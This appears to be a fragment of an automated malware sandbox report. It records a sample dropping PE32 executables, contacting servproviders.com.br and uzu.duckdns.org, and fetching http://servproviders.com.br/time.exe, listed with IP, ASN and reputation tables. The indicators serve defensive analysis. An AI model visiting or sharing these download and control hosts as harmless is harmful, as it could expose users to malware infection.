servproviders.com.br 192.185.215.87, 49685, 80 UNIFIEDLAYER-AS-1US United States 33->66 56 C:\Users\user\...\uIyibZtq20fMk9Yx.exe, PE32 33->56 dropped 58 C:\Users\user\AppData\Local\...\time[1].exe, PE32 33->58 dropped 84 Antivirus detection for dropped file 33->84 48 conhost.exe 38->48         started        file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.185.215.87
 servproviders.com.br United States
46606 UNIFIEDLAYER-AS-1US false

Contacted Domains

Name IP Active
servproviders.com.br 192.185.215.87 true
uzu.duckdns.org 192.169.69.25 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://servproviders.com.br/time.exe false
  • Avira URL Cloud: safe
 unknown